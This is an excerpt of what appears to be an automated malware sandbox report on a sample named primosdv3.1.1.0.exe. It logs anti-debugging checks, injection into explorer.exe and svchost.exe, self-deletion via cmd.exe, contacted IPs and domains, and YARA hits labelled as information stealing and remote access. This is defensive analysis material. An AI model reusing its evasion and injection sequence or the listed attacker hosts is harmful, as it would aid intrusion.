Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h] 2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h] 2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h] 2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h] 2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h] 2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C46A7 mov eax, dword ptr fs:[00000030h] 2_2_016C46A7
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h] 2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h] 2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h] 2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0165AAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0165AAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0167FAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DFE87 mov eax, dword ptr fs:[00000030h] 2_2_016DFE87
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h] 2_2_0167D294
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h] 2_2_0167D294
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01689540 NtReadFile,LdrInitializeThunk, 2_2_01689540
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7F9D5 SetUnhandledExceptionFilter, 0_2_00C7F9D5
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C7F838
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00C7FBCA
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C88EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C88EBD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 103.224.212.221 80
Source: C:\Windows\explorer.exe Network Connect: 5.101.152.161 80
Source: C:\Windows\explorer.exe Domain query: www.nordenergogrup.store
Source: C:\Windows\explorer.exe Domain query: www.sandstormcase.us
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 350000
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Thread register set: target process: 3452
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3452
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000003.00000000.334292418.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304261536.0000000006770000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.324252359.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.260934888.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00C7AF0F
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7F654 cpuid 0_2_00C7F654
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00C7DF1E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C6B146 GetVersionExW, 0_2_00C6B146

Stealing of Sensitive Information

Source: Yara match File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED